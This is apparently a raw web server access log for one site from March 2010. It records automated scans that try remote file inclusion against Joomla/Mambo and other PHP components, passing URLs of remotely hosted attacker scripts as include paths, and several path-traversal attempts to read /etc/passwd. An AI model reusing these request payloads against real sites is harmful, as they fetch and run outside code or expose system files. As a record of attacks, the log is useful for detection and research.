62.140.23.24 - - [04/Mar/2010:09:12:38 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:38 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:39 -0800] "GET /logs/access.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:12:40 -0800] "GET /logs/access_100209.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:12:40 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:12:40 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:12:40 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:12:44 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:09:13:18 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:09:13:29 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:13:30 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:13:30 -0800] "GET /logs/access_100209.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:13:33 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:13:33 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:13:34 -0800] "GET /logs/access_100203.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:13:34 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:13:36 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:13:36 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:09:13:36 -0800] "GET /logs/access_100203.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:13:38 -0800] "GET /logs/access_100203.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:14:14 -0800] "GET /logs/access_100203.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:14:14 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:14:15 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:14:23 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:14:23 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:14:23 -0800] "GET /admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:14:29 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:14:29 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:14:29 -0800] "GET /logs/access_100203.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.230.148.90 - - [04/Mar/2010:09:14:47 -0800] "GET /logs/access_100225.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:14:50 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:14:50 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:14:50 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:15:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:15:01 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:15:01 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.8.79.19 - - [04/Mar/2010:09:15:14 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:16:02 -0800] "GET /logs/access_100214.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:09:16:03 -0800] "GET /logs/access_100214.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:09:16:25 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:09:16:25 -0800] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:09:16:26 -0800] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:09:16:39 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:16:41 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:16:41 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:16:49 -0800] "GET /logs/access_100209.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:09:16:56 -0800] "GET /logs/access_100225.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:09:16:59 -0800] "GET /logs/access_100203.log%20%20//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:18:37 -0800] "GET /logs/access_100215.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:18:37 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:18:37 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:18:50 -0800] "GET /logs/access_100215.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:18:51 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:18:51 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:19:08 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:19:08 -0800] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:19:08 -0800] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:19:12 -0800] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:19:12 -0800] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:19:13 -0800] "GET /logs/access_100217.log%20%20//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:19:20 -0800] "GET /logs/access_100129.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.236.23.242 - - [04/Mar/2010:09:19:36 -0800] "GET /logs/access_100129.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:19:53 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:20:02 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:21:58 -0800] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:22:53 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:22:53 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:22:54 -0800] "GET /logs/access_100209.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:23:03 -0800] "GET /logs/access_100217.log//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:11 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:11 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:16 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:23:20 -0800] "GET /logs/access_100228.log//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:23:20 -0800] "GET /logs//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:22 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:23 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:24 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:24 -0800] "GET /logs/access_100209.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:25 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:23:25 -0800] "GET /index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:27 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:27 -0800] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:28 -0800] "GET /logs/access_100209.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:23:29 -0800] "GET /logs///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:24:20 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:24:49 -0800] "GET /logs/access_100209.log%20%20///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:09:25:04 -0800] "GET /logs/access_100217.log//index.php?option=com_extcalendar&mosConfig.absolute.path=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:09:26:15 -0800] "GET /logs/access_100209.log///components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:26:25 -0800] "GET /errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:26:25 -0800] "GET /logs//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:26:25 -0800] "GET /logs/access_100128.log%20%20//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.52.184.212 - - [04/Mar/2010:09:27:39 -0800] "GET //errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.833" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:29:07 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:29:07 -0800] "GET /logs/access_100202.log%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:09:29:07 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:09:31:02 -0800] "GET /logs/access_100202.log%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:09:31:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [04/Mar/2010:09:31:02 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:09:31:44 -0800] "GET /logs/access_100128.log//errors.php?error=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [04/Mar/2010:09:32:11 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:09:32:26 -0800] "GET /logs/access_100217.log%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:09:32:26 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:09:32:26 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 200 3642 "-" "-" "www.puaga.com"
67.228.16.228 - - [04/Mar/2010:09:33:07 -0800] "GET /sesskglogadmin.php?sesloga=1&skinnn=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [04/Mar/2010:09:33:07 -0800] "GET /logs/access_100130.log%20//sesskglogadmin.php?sesloga=1&skinnn=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [04/Mar/2010:09:33:07 -0800] "GET /logs//sesskglogadmin.php?sesloga=1&skinnn=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [04/Mar/2010:09:33:07 -0800] "GET /logs//sesskglogadmin.php?sesloga=1&skinnn=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [04/Mar/2010:09:33:07 -0800] "GET /sesskglogadmin.php?sesloga=1&skinnn=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
67.228.16.228 - - [04/Mar/2010:09:33:07 -0800] "GET /logs/access_100130.log%20//sesskglogadmin.php?sesloga=1&skinnn=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:09:38:25 -0800] "GET /logs/view.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:09:38:25 -0800] "GET /logs/access_100209.log/view.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:09:38:25 -0800] "GET /view.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:09:38:47 -0800] "GET /logs//index.php?option=com_poll&Itemid=&mosConfig.absolute.path=http://demo.njipn.com//idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
